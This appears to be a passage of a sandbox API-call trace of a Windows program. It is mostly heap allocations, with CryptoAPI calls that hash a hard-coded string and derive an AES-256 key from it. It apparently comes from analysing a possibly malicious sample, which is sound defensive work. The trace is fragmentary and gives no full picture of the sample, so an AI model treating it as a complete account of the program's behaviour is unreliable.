[0079.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0079.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0079.594] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.594] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0079.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cada8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0079.594] CryptHashData (hHash=0x41ac180, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0079.594] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.595] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.595] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0079.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cadd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0079.595] CryptDeriveKey (in: hProv=0x41a4ae0, Algid=0x6610, hBaseData=0x41ac180, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac280) returned 1 [0079.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0079.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0079.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0079.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0079.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0079.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0079.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0079.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0079.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0079.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0079.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0079.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0079.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0079.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0079.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0079.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0079.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0079.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0079.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0079.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0079.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0079.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0079.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0079.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0079.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0079.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0079.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0079.597] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0079.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0079.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0079.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0079.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0079.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0079.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0079.598] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0079.598] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0079.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0079.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.598] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0079.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0079.598] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0079.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0079.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0079.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0079.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0079.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafa0 [0079.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae68 [0079.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad90 [0079.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0079.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb030 [0079.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafe8 [0079.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae38 [0079.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb018 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae80 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0079.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae98 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caec8 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb060 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb078 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caee0 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caef8 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf58 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d90 [0079.599] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0079.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf28 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0079.599] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0079.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0079.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0079.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0079.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0079.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0079.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0079.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0079.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0079.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0079.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0079.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0079.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0079.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0079.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0079.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0079.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0079.600] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0079.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0079.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0079.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0079.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0079.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0079.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0079.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0079.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0079.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0079.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0079.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0079.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1797028 [0079.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797028, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0079.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0079.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0079.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0079.601] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0079.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0079.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0079.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0079.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0079.601] CryptDestroyHash (hHash=0x41ac180) returned 1 [0079.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0079.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0079.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0079.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0079.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 